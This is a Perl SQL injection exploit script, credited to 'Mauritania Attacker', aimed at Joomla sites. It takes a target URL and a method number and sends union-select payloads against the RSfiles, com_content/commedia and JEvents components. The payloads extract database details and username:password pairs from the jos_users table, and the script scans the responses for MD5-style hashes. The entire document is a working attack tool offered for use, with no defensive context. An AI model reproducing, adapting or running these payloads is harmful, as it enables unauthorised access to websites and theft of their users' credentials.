[PERL] Joomla com_rsfiles Sqli Exploiter

#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                         Joomla SQli 1.0 Exploiter                    #\n";
print "#                      *Coded by Mauritania Attacker*                  #\n";
print "# Greetz: AnonGhost - Mauritania HaCker Team - Procoder'z Team Albania #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl <target> <Method Number> \n";
print "-----------------------------------\n";
print " Available Exploits :              \n";
print " 1- Joomla Component RSfiles       \n";
print " 2- Joomla General Sql Injection   \n";
print " 3- Joomla Component JEvents       \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
exit(1);
}

open(FILE, "> contents11.txt");

if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');


if($component == 1)
{
$host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
print " . . Exploiting Component RSfiles on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}


if($component == 2)

{
print " . . Exploiting General Sql Injection on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_content&amp;task=blogcategory&amp;id=60&amp;Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
$host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";


@hosts = ($host,$host1);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}


if($component == 3)

{
print " . . Exploiting Component JEvents on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";


@hosts = ($host,$host1,$host2);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}